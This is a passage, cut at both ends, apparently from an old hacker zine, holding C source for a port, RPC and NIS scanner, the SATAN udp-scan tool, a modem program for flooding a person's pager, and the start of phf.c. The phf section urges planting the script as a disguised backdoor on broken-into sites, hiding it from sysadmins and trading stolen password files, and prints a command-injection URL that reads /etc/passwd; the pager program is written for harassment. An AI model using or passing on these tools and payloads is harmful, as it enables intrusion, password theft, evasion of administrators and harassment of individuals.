} yp_maps[] = {
{"passwd", "passwd.byname", false},
{"group", "group.byname", false},
{"networks", "networks.byaddr", false},
{"hosts", "hosts.byaddr", false},
{"protocols", "protocols.bynumber", false},
{"services", "services.byname", false},
{"aliases", "mail.aliases", false},
{"ethers", "ethers.byname", false},
{NULL, NULL, false}
};
scan_t scan_type;
char remote_host[200];
char remote_ip[20];
int low_port;
int high_port;
int key;
void print_version(s)
{
fprintf(stderr,"%s version %d.%d\n",s,MAJOR, MINOR);
exit(0);
}
void print_usage(s)
{
fprintf(stderr,"usage %s: <scan type> <host> [low port] [high port]\n",s);
fprintf(stderr,"where scan type is one of:\n");
#ifdef __GNU_LIBRARY__
fprintf(stderr," --tcp, -t - TCP port scan\n");
fprintf(stderr," --udp, -u - UDP port scan(NOT implemented)\n");
fprintf(stderr," --rpc, -r - RPC service list\n");
fprintf(stderr," --nis, -n - NIS map listing\n");
fprintf(stderr," --version, -v - Print version information\n");
fprintf(stderr," --help, -h - Print usage information\n");
#else
fprintf(stderr," -t - TCP port scan\n");
fprintf(stderr," -u - UDP port scan(NOT implemented)\n");
fprintf(stderr," -r - RPC service list\n");
fprintf(stderr," -n - NIS map listing\n");
fprintf(stderr," -v - Print version information\n");
fprintf(stderr," -h - Print usage information\n");
#endif
fprintf(stderr,"\n");
exit(0);
}
void get_args(n,v)
int n;
char *v[];
{
int c;
int opt_ind;
scan_type = s_none;
while (true) {
#ifdef __GNU_LIBRARY__
c = getopt_long(n,v,"turnhv",long_options,&opt_ind);
#else
c = getopt(n,v,"turnhv");
#endif
if (c == -1)
break;
switch(c) {
#ifdef __GNU_LIBRARY__
case 0:
opt_ind++; /* index's are one less than the scan type */
if (opt_ind == 5)
print_usage(v[0]);
if (opt_ind == 6)
print_version(v[0]);
scan_type = opt_ind;
break;
#endif
case 't':
scan_type = s_tcp;
break;
case 'u':
/* This doen't work, but i added it in case you wish to add it in */
scan_type = s_udp;
break;
case 'r':
scan_type = s_rpc;
break;
case 'n':
scan_type = s_nis;
break;
case 'v':
print_version(v[0]);
break;
case 'h':
case '?':
print_usage(v[0]);
break;
}
}
low_port = LOWEST_PORT;
high_port = HIGHEST_PORT;
for (opt_ind = 0;optind < n;optind++) {
switch(opt_ind++) {
case 0: /* remote host */
strncpy(remote_host,v[optind],199);
break;
case 1: /* low port */
low_port = atoi(v[optind]);
break;
case 2: /* high port */
high_port = atoi(v[optind]);
break;
}
}
if ((opt_ind == 0) || (scan_type == s_none)) {
fprintf(stderr,"error: you must specify a scan type and a host\n");
print_usage(v[0]);
}
}
void check_args()
{
struct hostent *host;
host = gethostbyname(remote_host);
if (host == NULL) {
unsigned char a,b,c,d,n;
char addr[5];
/* hmm.. perhaps it was a dotted quad entered.. */
n = sscanf(remote_host,"%u.%u.%u.%u",&a,&b,&c,&d);
if (n != 4) {
fprintf(stderr,"error: host '%s' not found\n",remote_host);
exit(1);
}
addr[0] = a;
addr[1] = b;
addr[2] = c;
addr[3] = d;
host = gethostbyaddr(addr,4,AF_INET);
if (host == NULL) {
fprintf(stderr,"error: host '%s' not found\n",remote_host);
exit(1);
}
sprintf(remote_ip,"%u.%u.%u.%u",a,b,c,d);
} else {
sprintf(remote_ip,"%u.%u.%u.%u",
(unsigned char) host->h_addr_list[0][0],
(unsigned char) host->h_addr_list[0][1],
(unsigned char) host->h_addr_list[0][2],
(unsigned char) host->h_addr_list[0][3]);
}
}
void print_args()
{
static char *opt_table[] = {
"tcp","udp","rpc","nis"
};
fprintf(stdout,"scanning host %s's %s ports ",remote_host,
opt_table[scan_type-1]);
if (scan_type < 3) {
fprintf(stdout,"%d through %d",LOWEST_PORT,HIGHEST_PORT);
}
fprintf(stdout,"\n");
}
int scan()
{
int soc;
struct sockaddr_in addr;
struct servent *serv;
int port,rc,addr_len,opt;
if (scan_type >= 3) /* this proc only does tcp and udp */
return;
for (port = LOWEST_PORT;port <= HIGHEST_PORT;port++) {
if (scan_type == s_tcp) {
soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
} else if (scan_type == s_udp) {
soc = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
} else
return;
if (soc < 0) {
fprintf(stderr,"error: socket() failed\n");
return;
}
rc = setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,&opt,sizeof(opt));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(remote_ip);
addr.sin_port = htons(port);
addr_len = sizeof(addr);
rc = connect(soc, (struct sockaddr*) &addr, addr_len);
if (scan_type == s_udp) {
/* This currently doesnt work, its a pain in the ass to scan
UDP, and since no really important services run under UDP,
You really dont need it. */
printf(stderr,"\nUDP Scanning is not implemented. Do it
yourself!\n\n");
exit(1);
}
close(soc);
if (rc < 0)
continue;
if (scan_type == s_tcp)
serv = getservbyport(htons(port),"tcp");
else if (scan_type == s_udp)
serv = getservbyport(htons(port),"udp");
else
return;
fprintf(stdout,"port %d (%s) is running\n",port,(serv ==
NULL)?"UNKNOWN":
serv->s_name);
}
}
/* The next two routines were ripped out of ypcat , but with a few changes */
int callback_proc(is,ik,ikl,iv,ivl,id)
int is;
char *ik;
int ikl;
char *iv;
int ivl;
char *id;
{
if (is != YP_TRUE)
return is;
return 0;
}
void nis_dump()
{
int i,rc;
char *domainname;
char *map;
struct ypall_callback callback;
domainname = &remote_host[0];
for (i = 0;yp_maps[i].mapname != NULL;i++) {
key = 0;
callback.foreach = callback_proc;
callback.data = NULL;
map = yp_maps[i].mapname;
rc = yp_all(domainname,map,&callback);
switch(rc) {
case 0:
printf("%-10.10s is available\n",yp_maps[i].alias);
break;
case YPERR_YPBIND:
fprintf(stderr,"error: server is not running ypbind\n");
exit(1);
break;
default:
fprintf(stderr,"error: %s\n",yperr_string(rc));
exit(1);
}
}
}
/* this routine basically ripped from rpcinfo -p */
void rpc_scan()
{
struct sockaddr_in server_addr;
register struct hostent *hp;
struct pmaplist *head = NULL;
int socket = RPC_ANYSOCK;
struct timeval minutetimeout;
register CLIENT *client;
struct rpcent *rpc;
minutetimeout.tv_sec = 60;
minutetimeout.tv_usec = 0;
server_addr.sin_addr.s_addr = inet_addr(remote_ip);
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(111);
if ((client = clnttcp_create(&server_addr, PMAPPROG,
PMAPVERS, &socket, 50, 500)) == NULL) {
clnt_pcreateerror("rpcinfo: can't contact portmapper");
exit(1);
}
if (clnt_call(client, PMAPPROC_DUMP, xdr_void, NULL,
xdr_pmaplist, &head, minutetimeout) != RPC_SUCCESS) {
fprintf(stderr, "rpcinfo: can't contact portmapper: ");
clnt_perror(client, "rpcinfo");
exit(1);
}
if (head == NULL) {
printf("No remote programs registered.\n");
} else {
printf(" program vers proto port\n");
for (; head != NULL; head = head->pml_next) {
printf("%10ld%5ld",
head->pml_map.pm_prog,
head->pml_map.pm_vers);
if (head->pml_map.pm_prot == IPPROTO_UDP)
printf("%6s", "udp");
else if (head->pml_map.pm_prot == IPPROTO_TCP)
printf("%6s", "tcp");
else
printf("%6ld", head->pml_map.pm_prot);
printf("%7ld", head->pml_map.pm_port);
rpc = getrpcbynumber(head->pml_map.pm_prog);
if (rpc)
printf(" %s\n", rpc->r_name);
else
printf("\n");
}
}
}
int main(argc,argv)
int argc;
char *argv[];
{
get_args(argc,argv);
check_args();
print_args();
/* this will only do tcp and udp, otherwise returns without doing
anything */
switch (scan_type) {
case s_tcp:
scan();
break;
case s_udp:
fprintf(stderr,"UDP port scanning is not implemented in this version\n");
break;
case s_rpc:
rpc_scan();
break;
case s_nis:
nis_dump();
break;
}
return 0;
}
_____________________________________________________________
[ udp-scan.c Wietse Venema - from good old Satan v.1.1.1]
Ok, well you really want a good udp scanner and prober? well i was
looking thru the source of Satan the other day, and this popped up. Have fun
with it now..... and thank Wietse for the code, and Dan Farmer too, for his
work on Satan. ( geez, he lost his job over it, give him some credit and
thanks. )
/*
* udp-scan - determine available udp services
*
* Author: Wietse Venema.
*/
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/*#include <netinet/udp.h>*/
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include "../../include/netinet/ip_icmp_lin.h"
#include "../../include/netinet/udp_lin.h"
extern int errno;
#ifndef __STDC__
extern char *strerror();
#endif
extern char *optarg;
extern int optind;
#define offsetof(t,m) (size_t)(&(((t *)0)->m))
#ifndef FD_SET
#include <sys/select.h>
#endif
#include "lib.h"
#define LOAD_LIMIT 100 /* default max nr of open sockets */
#define AVG_MARGIN 10 /* safety margin */
/*
* In order to protect ourselves against dead hosts, we first probe UDP port
* 1. If we do not get an ICMP error (no listener or host unreachable) we
* assume this host is dead. If we do get an ICMP error, we have an estimate
* of the roundtrip time. The test port can be changed with the -p option.
*/
char *test_port = "1";
int test_portno;
#define YES 1
#define NO 0
int verbose = 0; /* default silent mode */
int open_file_limit; /* max nr of open files */
/*
* We attempt to send as many probes per roundtrip time as network capacity
* permits. With UDP we must do our own retransmission and congestion
* handling.
*/
int hard_limit = LOAD_LIMIT; /* max nr of open sockets */
int soft_limit; /* slowly-moving load limit */
struct timeval now; /* global time after select() */
int ports_busy; /* number of open sockets */
int want_err = 0; /* show reachable/unreachable */
int show_all = 0; /* show all ports */
/*
* Information about ongoing probes is sorted by time of last transmission.
*/
struct port_info {
RING ring; /* round-robin linkage */
struct timeval last_probe; /* time of last probe */
int port; /* port number */
int pkts; /* number of packets sent */
};
struct port_info *port_info = 0;
RING active_ports; /* active sockets list head */
RING dead_ports; /* dead sockets list head */
struct port_info *find_port_info(); /* retrieve port info */
/*
* Performance statistics. These are used to update the transmission window
* size depending on transmission error rates.
*/
double avg_irt = 0; /* inter-reply arrival time */
double avg_rtt = 0; /* round-trip time */
double avg_pkts = 1; /* number of packets sent per reply */
int probes_sent = 0; /* probes sent */
int probes_done = 0; /* finished probes */
int replies; /* number of good single probes */
struct timeval last_reply; /* time of last reply */
int send_sock; /* send probes here */
int icmp_sock; /* read replies here */
fd_set icmp_sock_mask; /* select() read mask */
static struct sockaddr_in sin;
/*
* Helpers...
*/
#define time_since(t) (now.tv_sec - t.tv_sec + 1e-6 * (now.tv_usec - t.tv_usec))
#define sock_age(sp) time_since(sp->last_probe)
double average();
struct port_info *add_port();
/* main - command-line interface */
main(argc, argv)
int argc;
char *argv[];
{
int c;
struct protoent *pe;
char **ports;
progname = argv[0];
if (geteuid())
error("This program needs root privileges");
open_file_limit = open_limit();
while ((c = getopt(argc, argv, "al:p:uUv")) != EOF) {
switch (c) {
case 'a':
show_all = 1;
break;
case 'l':
if ((hard_limit = atoi(optarg)) <= 0)
usage("invalid load limit");
break;
case 'p':
test_port = optarg;
break;
case 'u':
want_err = EHOSTUNREACH;
break;
case 'U':
want_err = ~EHOSTUNREACH;
break;
case 'v':
verbose = 1;
break;
default:
usage((char *) 0);
break;
}
}
argc -= (optind - 1);
argv += (optind - 1);
if (argc < 3)
usage("missing argument");
if (hard_limit > open_file_limit - 10)
hard_limit = open_file_limit - 10;
soft_limit = hard_limit + 1;
init_port_info();
if ((pe = getprotobyname("icmp")) == 0)
error("icmp: unknown protocol");
if ((icmp_sock = socket(AF_INET, SOCK_RAW, pe->p_proto)) < 0)
error("icmp socket: %m");
FD_ZERO(&icmp_sock_mask);
FD_SET(icmp_sock, &icmp_sock_mask);
if ((send_sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
error("socket: %m");
/*
* First do a test probe to see if the host is up, and to establish the
* round-trip time. This requires that the test port is not used.
*/
memset((char *) &sin, 0, sizeof(sin));
sin.sin_addr = find_addr(argv[1]);
sin.sin_family = AF_INET;
gettimeofday(&now, (struct timezone *) 0);
last_reply = now;
/*
* Calibrate round-trip time and dead time.
*/
for (;;) {
scan_ports(test_port);
while (ports_busy > 0)
monitor_ports();
if (avg_rtt)
break;
sleep(1);
}
scan_ports(test_port);
/*
* Scan those ports.
*/
for (ports = argv + 2; *ports; ports++)
scan_ports(*ports);
/*
* All ports probed, wait for replies to trickle back.
*/
while (ports_busy > 0)
monitor_ports();
return (0);
}
/* usage - explain command syntax */
usage(why)
char *why;
{
if (why)
remark(why);
error("usage: %s [-apuU] [-l load] host ports...", progname);
}
/* scan_ports - scan ranges of ports */
scan_ports(service)
char *service;
{
char *cp;
int min_port;
int max_port;
int port;
struct port_info *sp;
if (service == test_port)
test_portno = atoi(test_port);
/*
* Translate service argument to range of port numbers.
*/
if ((cp = strchr(service, '-')) != 0) {
*cp++ = 0;
min_port = (service[0] ? ntohs(find_port(service, "udp")) : 1);
max_port = (cp[0] ? ntohs(find_port(cp, "udp")) : 65535);
} else {
min_port = max_port = ntohs(find_port(service, "udp"));
}
/*
* Iterate over each port in the given range. Adjust the number of
* simultaneous probes to the capacity of the network.
*/
for (port = min_port; port <= max_port; port++) {
sp = add_port(port);
write_port(sp);
monitor_ports();
}
}
/* monitor_ports - watch for socket activity */
monitor_ports()
{
do {
struct port_info *sp;
/*
* When things become quiet, examine the port that we haven't looked
* at for the longest period of time.
*/
receive_answers();
if (ports_busy == 0)
return;
sp = (struct port_info *) ring_succ(&active_ports);
if (sp->pkts > avg_pkts * AVG_MARGIN) {
report_and_drop_port(sp, 0);
} else
/*
* Strategy depends on whether transit times dominate (probe
* multiple ports in parallel, retransmit when no reply was
* received for at least one round-trip period) or by dead time
* (probe one port at a time, retransmit when no reply was
* received for some fraction of the inter-reply period).
*/
if (sock_age(sp) > (avg_rtt == 0 ? 1 :
2 * avg_rtt < avg_irt ? avg_irt / 4 :
1.5 * avg_rtt)) {
write_port(sp);
}
/*
* When all ports being probed seem to be active, send a test probe
* to see if the host is still alive.
*/
if (time_since(last_reply) > 3 * (avg_rtt == 0 ? 1 :
avg_rtt < avg_irt ? avg_irt : avg_rtt)
&& find_port_info(test_portno) == 0) {
last_reply = now;
write_port(add_port(test_portno));
}
} while (ports_busy && (ports_busy >= hard_limit
|| ports_busy >= probes_done
|| ports_busy >= soft_limit));
}
/* receive_answers - receive reactions to probes */
receive_answers()
{
fd_set read_mask;
struct timeval waitsome;
double delay;
int answers;
/*
* The timeout is less than the inter-reply arrival time or we would not
* be able to increase the load.
*/
delay = (2 * avg_rtt < avg_irt ? avg_irt / 3 : avg_rtt / (1 + ports_busy * 4));
waitsome.tv_sec = delay;
waitsome.tv_usec = (delay - waitsome.tv_sec) * 1000000;
read_mask = icmp_sock_mask;
if ((answers = select(icmp_sock + 1, &read_mask, (fd_set *) 0, (fd_set *) 0,
&waitsome)) < 0)
error("select: %m");
gettimeofday(&now, (struct timezone *) 0);
/*
* For each answer that we receive without retransmissions, update the
* average roundtrip time.
*/
if (answers > 0) {
if (FD_ISSET(icmp_sock, &read_mask))
receive_icmp(icmp_sock);
}
return (answers);
}
/* receive_icmp - receive and decode ICMP message */
receive_icmp(sock)
int sock;
{
union {
char chars[BUFSIZ];
struct ip ip;
} buf;
int data_len;
int hdr_len;
struct ip *ip;
struct icmp *icmp;
struct udphdr *udp;
struct port_info *sp;
if ((data_len = recv(sock, (char *) &buf, sizeof(buf), 0)) < 0) {
error("error: recv: %m");
return;
}
/*
* Extract the IP header.
*/
ip = &buf.ip;
if (ip->ip_p != IPPROTO_ICMP) {
error("error: not ICMP proto (%d)", ip->ip_p);
return;
}
/*
* Extract the IP payload.
*/
hdr_len = ip->ip_hl << 2;
if (data_len - hdr_len < ICMP_MINLEN) {
remark("short ICMP packet (%d bytes)", data_len);
return;
}
icmp = (struct icmp *) ((char *) ip + hdr_len);
data_len -= hdr_len;
if (icmp->icmp_type != ICMP_UNREACH)
return;
/*
* Extract the offending IP header.
*/
if (data_len < offsetof(struct icmp, icmp_ip) + sizeof(icmp->icmp_ip)) {
remark("short IP header in ICMP");
return;
}
ip = &(icmp->icmp_ip);
if (ip->ip_p != IPPROTO_UDP)
return;
if (ip->ip_dst.s_addr != sin.sin_addr.s_addr)
return;
/*
* Extract the offending UDP header.
*/
hdr_len = ip->ip_hl << 2;
udp = (struct udphdr *) ((char *) ip + hdr_len);
data_len -= hdr_len;
if (data_len < sizeof(struct udphdr)) {
remark("short UDP header in ICMP");
return;
}
/*
* Process ICMP subcodes.
*/
switch (icmp->icmp_code) {
case ICMP_UNREACH_NET:
error("error: network unreachable");
/* NOTREACHED */
case ICMP_UNREACH_HOST:
if (sp = find_port_info(ntohs(udp->uh_dport)))
process_reply(sp, EHOSTUNREACH);
break;
case ICMP_UNREACH_PROTOCOL:
error("error: protocol unreachable");
/* NOTREACHED */
case ICMP_UNREACH_PORT:
if (sp = find_port_info(ntohs(udp->uh_dport)))
process_reply(sp, ECONNREFUSED);
break;
}
}
/* process_reply - process reply */
process_reply(sp, err)
struct port_info *sp;
int err;
{
double age = sock_age(sp);
int pkts = sp->pkts;
double irt = time_since(last_reply);
/*
* Don't believe everything.
*/
if (age > 5) {
age = 5;
} else if (age < 0) {
age = 1;
}
if (irt > 5) {
irt = 5;
} else if (irt < 0) {
irt = 1;
}
/*
* We jump some hoops for calibration purposes. First we estimate the
* round-trip time: we use this to decide when to retransmit when network
* transit time dominates.
*
* Next thing to do is to estimate the inter-reply time, in case the sender
* has a "dead time" for ICMP replies; I have seen this happen with some
* Cisco routers and with Solaris 2.4. The first reply will come fast;
* subsequent probes will be ignored for a period of up to one second.
* When this happens the retransmission period should be based on the
* inter-reply time and not on the average round-trip time.
*/
last_reply = now;
replies++;
if (pkts == 1)
avg_rtt = (avg_rtt == 0 ? age : /* adopt initial rtt */
average(age, avg_rtt)); /* normal processing */
avg_irt = (avg_irt == 0 ? 1 : /* prepare for irt
* calibration */
avg_irt == 1 ? irt : /* adopt initial irt */
average(irt, avg_irt)); /* normal processing */
avg_pkts = average((double) pkts, avg_pkts);
if (verbose)
printf("%d:age %.3f irt %.3f pkt %d ports %2d soft %2d done %2d avrtt %.3f avpkt %.3f avirt %.3f\n",
sp->port, age, irt, pkts,
ports_busy, soft_limit,
probes_done, avg_rtt, avg_pkts, avg_irt);
report_and_drop_port(sp, err);
}
/* report_and_drop_port - report what we know about this service */
report_and_drop_port(sp, err)
struct port_info *sp;
int err;
{
struct servent *se;
if (probes_done == 0) {
if (err == 0)
error("are we talking to a dead host or network?");
} else if (show_all || want_err == err || (want_err < 0 && want_err != ~err)) {
printf("%d:%s:", sp->port,
(se = getservbyport(htons(sp->port), "udp")) ?
se->s_name : "UNKNOWN");
if (err && show_all)
printf("%s", strerror(err));
printf("\n");
fflush(stdout);
}
drop_port(sp);
}
/* average - quick-rise, slow-decay moving average */
double average(new, old)
double new;
double old;
{
if (new > old) { /* quick rise */
return ((new + old) / 2);
} else { /* slow decay */
return (0.1 * new + 0.9 * old);
}
}
/* add_port - say this port is being probed */
struct port_info *add_port(port)
int port;
{
struct port_info *sp = (struct port_info *) ring_succ(&dead_ports);
ring_detach((RING *) sp);
sp->port = port;
sp->pkts = 0;
ports_busy++;
ring_append(&active_ports, (RING *) sp);
return (sp);
}
/* write_port - write to port, update statistics */
write_port(sp)
struct port_info *sp;
{
char ch = 0;
ring_detach((RING *) sp);
sin.sin_port = htons(sp->port);
sp->last_probe = now;
sendto(send_sock, &ch, 1, 0, (struct sockaddr *) & sin, sizeof(sin));
probes_sent++;
sp->pkts++;
ring_prepend(&active_ports, (RING *) sp);
/*
* Reduce the sending window when the first retransmission happens. Back
* off when retransmissions dominate. Occasional retransmissons will keep
* the load unchanged.
*/
if (sp->pkts > 1) {
replies--;
if (soft_limit > hard_limit) {
soft_limit = (ports_busy + 1) / 2;
} else if (replies < 0 && avg_irt) {
soft_limit = 0.5 + 0.5 * (soft_limit + avg_rtt / avg_irt);
replies = soft_limit / 2;
}
}
}
/* drop_port - release port info, update statistics */
drop_port(sp)
struct port_info *sp;
{
ports_busy--;
probes_done++;
ring_detach((RING *) sp);
ring_append(&dead_ports, (RING *) sp);
/*
* Increase the load when a sufficient number of probes succeeded.
* Occasional retransmissons will keep the load unchanged.
*/
if (replies > soft_limit) {
replies = soft_limit / 2;
if (soft_limit < hard_limit)
soft_limit++;
}
}
/* init_port_info - initialize port info pool */
init_port_info()
{
struct port_info *sp;
port_info = (struct port_info *) mymalloc(hard_limit * sizeof(*port_info));
ring_init(&active_ports);
ring_init(&dead_ports);
for (sp = port_info; sp < port_info + hard_limit; sp++)
ring_append(&dead_ports, (RING *) sp);
}
/* find_port_info - lookup port info */
struct port_info *find_port_info(port)
int port;
{
struct port_info *sp;
for (sp = (struct port_info *) ring_succ(&active_ports);
sp != (struct port_info *) & active_ports;
sp = (struct port_info *) ring_succ((RING *) sp))
if (sp->port == port)
return (sp);
return (0);
}
_____________________________________________________________
[ French Pager Annyoing] by memor
A little C++ (Borland3.1) program for Pager Annoying.
1--- Why that program?
You Call french pagers TATOO via an automatic number reserved for each pager.
in france , they begin by 0806xxxx mosty.. (for calling them via a foreign
country like usa.. it is (+33) 806xxxx )
Well.. That program is using modem for paging someone u want to call u back..
it dials his pager, send the message (a number he will have to call back).
That program make ure modem paging him 1 time or many times.. with many times
i mean ,u can full his pager memory with 50-60k of page.
*** BY THE WAY ***
The dialing process for a french pager "TATOO" Motorola&France Telecom is
1/ Dial Tatoo Pager
2/ Dial Numeric Message
3/ Dial #
4/ Hang Up
Its why the algorithm of my program is :
begin:
|
| ****************************
| *Define variables nbr,a,...*
| ****************************
|
| ***************************
| *Configure (9600bauds,8n1)* (8n1 = 8 bits per byte.. No parity and 1 Stop Bit)
| ***************************
|
| ********************************
| *Ask Time Number of Paging->nbr*
| ********************************
|
| **************************
| *His Pager Number->Number*
| **************************
|
|
| **************************
| *Message to send->Message*
| **************************
|
| *******************
| *Send ATZ + Return*
| *******************
|
| **************
| *Wait 0.5 Sec*
| **************
|
| ********************
| *0 to nbr.. do that*
| ********************
| |
| | ***********
| | *Send ATDT*
| | ***********
| |
| | *************
| | *Send Number*
| | *************
| |
| | ***********
| | *Send ,,,,*
| | ***********
| |
| | **************
| | *Send Message*
| | **************
| |
| | *************
| | *Send Return*
| | *************
| |
| | **********
| | *Send +++*
| | **********
| |
| | *************
| | *Wait 1.5sec*
| | *************
| |
| | ********************
| | *Send ATH0 + Return*
| | ********************
|
| *************
| *Continue It*
| *************
|
end:
******************
I used here for using serial device the INT86 (in dos.h) , i could have used
outportb .. but i felt like using int86 (slower thing), maybe next time i'll
do it with outportb.
In that programm i used thoses modem command but first:
*REMEMBER...*
AT are the "AT" commands.. its a prefix "AT" , issued to the modem from the
command mode (that command mode will be automatically set when the computer
will be turned on).
*************
ATZ : the reset.. That at command will reset all the modem values to their
default settings. It respond OK, you have mostly to wait 1/2 sec before
sending other commands.
ATD: Dial.. That at command instructs the modem to the off-hook state and
dial the number that follow it. that command can be followed by the Dial
Modifier.
P: for pulse dial (using pulse rotary dialing) .. not needed her AT ALL
T: for touch tone dial I'll use THAT one.
so..ATDT.. Touch Tone Dialing.
, in a ATDT is for waiting a 2 seconds delay
ATDT 11,,2 will dial 11 , wait 4 seconds (2*2s) and will dial 2 .. all that
in touch tone.
+++ : Set the modem to the command mode.. its an escape sequence. It needs at
least one second pause before issuing other commands.
ATH0: Switch the hook control, instructs the modem to drop the line.. Hanging
up.
2--- Some Programming..
/*Including libraries*/
#include <dos.h> /*For using INT86*/
#include <string.h> /*Gets and Strlen are here*/
#include <stdio.h> /*Printf..Scanf...*/
#include <conio.h> /*For Lame Presentation*/
#include <stdlib.h> /*For Fun maybe*/
/*Define modem reseting,dialing,hangup,pause*/
char atz[10]="ATZ\n"; /*Reset*/
char atdt[10]="ATDT"; /*Dial Mode Touch Tone Dial*/
char pose[10]=",,,,"; /*2sec Pause * 4*/
char ppp[10]="+++\n"; /*Escape to Command Mode*/
char ath[10]="ATH0\n"; /*Hey Modem!,Drop the line please*/
/*define sub-fonctions modem configuring and Char sending*/
void configure(); /*Define Default Modem Configuring*/
void send(char x); /*Define Send the Char X!*/
/*main routine*/
void main()
{
int a,nbr=0; /*Define number of paging*/
char number[128]; /*Define pager number as char*/
char message[128]; /*Define Message to send as Char*/
clrscr(); /*Lame presentation*/
configure(); /*Call modem configuring*/
printf("Modem configured\n 9600 8n1"); /*Lame Presentation*/
printf("How many time do u want to page him?"); /*Same*/
scanf("%d",&nbr); /*Asking number of paging*/
fflush(stdin); /*For killing some bug with gets*/
printf("What is his pager number?"); /*Lame Presentation*/
gets(number); /*Catching pager number*/
printf("What message u want to send him (finish by a # on french Tatoos pager)"); /*Lame Presentation*/
gets(message); /*Catching Message to page*/
printf("Reseting modem\n"); /*Lame Presentation*/
for(a=0;a<strlen(atz);a++) /*Reseting modem*/
send(atz[a]); /*Call Send Char*/
delay(500); /*Wait time the modem reply 'OK' */
for(int i=0;i<nbr;i++) /*Number of time it will page*/
{
printf("Paging him %d / %d \n",i+1,nbr+1); /*Lame Presentation*/
for(a=0;a<strlen(atdt);a++) /*ATDT in progress*/
send(atdt[a]); /*Call Send Char*/
for(a=0;a<strlen(number);a++) /*Pager Numer in progress*/
send(number[a]); /*Call Send Char*/
for(a=0;a<strlen(pose);a++) /*Pause in Progress*/
send(pose[a[); /*Call Send Char*/
for(a=0;a<strlen(message);a++) /*Sending Message in Progress*/
send(message[a]); /*Call Send Char*/
send(13); /*Send Return*/
for(a=0;a<strlen(ppp);a++) /*Escape Sequence to Command Mode in Progress*/
send(ppp[a]); /*Call Send Char*/
delay(1500); /*Wait 1.5 sec before sending ByeBye Command*/
for(a=0;a<strlen(ath);a++) /*Hanging Up Command in Progress*/
send(ath[a]); /*Call Send Char*/
delay(500); /*Wait 0.5sec before other paging*/
} /*Go Back to the For*/
printf("Paging finished\n"); /*Lame Presentation*/
}
void configure() /*Configuring modem*/
{
union REGS regs; /*Preparing INT86*/
regs.h.ah=0; /*For Configuring Option*/
regs.x.dx=1; /*1 here cause its needed*/
regs.h.al=0xe3; /*0x03 for 8n1 9600bauds*/
int86(0x14,®s,®s); /*0x14 for serial using of INT86*/
}
void send(char x) /*Sending a char X*/
{
union REGS regs; /*Preparing INT86*/
regs.h.ah=1; /*For Sending Option*/
do /*Preparing a Do-while*/
{
regs.x.dx=1; /*1 here cause its needed*/
regs.h.al=x; /*Send X please../*
int86(0x14,®s,®s); /*0x14 for serial using of INT86*/
}while(regs.h.ah!=0); /*While sending not succeeded, continue trying*/
}
3--- Next time.
Next time, i'll can do.. or that same program but with outportb (faster) ,
or that program under some windows interfaces.. or a totally different
program, a wardialler.. or a PBX scanner.. Decide for me dudes .
_____________________________________________________________
[ The good old phf.c ]
Ok, your saying, 'what not this old lame trick'. But hey, shut up and
read this for a minute. What im giving you here, is well ok, public domain,
but have any of you even bothered to go to the nsca and get a copy? probably
not. This hole is now well known, but hey, set this program up in the cgi-bin
of the site you have broken into. Compile and instant back door to the
passwords. Am i right, or am i right? Anyway, i was going thru this code the
other day, and then poof, memor was telling me, his standard procedure now is
to load this up after renaming it memor, so snooping sysadmins dont notice
it, which is a good idea, but id call it either 'logger' or 'scan' or
someother 'offical' sounding httpd cgi so they dont mess with it. Anyway, go
have fun with this you little deliquents. Oh, by the way, if you've been
messing with some Netscape server ( which doesn't come with phf ) install it,
and share passwords with your friends, trade, collect, share, etc. ( hmmm, i
guess that passwd files are as collectable as baseball cards )
Ok, if you've forgotten how this thing works, type in the following:
http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
[ phf.c ]
#include <stdio.h>
#include <stdlib.h>
#define LF 10
#define HTML_BREAK printf("<P>%c", LF);
typedef struct {
char name[128];
char val[128];
} entry;
typedef struct {
char qfield[256];
int qlen;
char qname[256];
} fields;
void getword(char *word, char *line, char stop);
char x2c(char *what);
void unescape_url(char *url);
void plustospace(char *str);
void send_fd(FILE *f, FILE *fd);
void send_doc(int which);
static fields idxfields[] = { {"Qalias", 32, "Alias"},
{"Qname", 256, "Name" },
{"Qemail", 128, "E-mail Address"},
{"Qnickname", 120, "Nickname"},
{"Qoffice_phone", 60, "Office Phone Number"},
{"Qcallsign", 16, "HAM Callsign"},
{"Qproxy", 64, "Proxy"},
{"Qhigh_school", 30, "High School"},
{"Qslip", 256, "SLIP Address"},
{NULL, 0, NULL}
};
static fields othersearchfields[] = { {"Qcurriculum", 64, "Curriculum"},
{"Qphone", 64, "Phone Number" },
{"Qaddress", 128, "Address"},
{"Qoffice_address", 128, "Office Address"},
{"Qhome_address", 128, "Home Address"},
{"Qpermanent_address", 128, "Permanent Address"},
{"Qpermanent_phone", 60, "Permanent Phone"},
{"Qdepartment", 64, "Department"},
{"Qtitle", 64, "Title"},
{"Qproject", 256, "Project"},
{"Qother", 256, "Other"},
{"Qbirthday", 24, "Birthday"},
{"Qcolleges", 120, "Colleges Attended"},
{"Qleft_uiuc", 24, "Date/Month Person left UIUC"},
{NULL, 0, NULL},
};
void send_doc(int which) {
int x;
printf("<TITLE>Form for CSO PH query</TITLE>%c", LF);
printf("<H1>Form for CSO PH query</H1>%c", LF);
printf("This form will send a PH query to the specified ph server.%c", LF);
HTML_BREAK
printf("<HR>%c", LF);
printf("<FORM ACTION=\"http://%s:%s%s\">%c", getenv("SERVER_NAME"),
getenv("SERVER_PORT"), getenv("SCRIPT_NAME"), LF);
printf("PH Server:<INPUT TYPE=\"text\" NAME=\"Jserver\" VALUE=\"ns.uiuc.edu\" MAXLENGTH=\"256\">%c", LF);
HTML_BREAK
printf("<H3>At least one of these fields must be specified:</H3><UL>%c",LF);
for(x=0; idxfields[x].qlen != 0; x++)
printf("<LI><INPUT TYPE=\"text\" NAME=\"%s\" MAXLENGTH=\"%d\">%s%c"
,idxfields[x].qfield, idxfields[x].qlen, idxfields[x].qname,LF);
printf("</UL>%c", LF);
if (!(which&0x10)) {
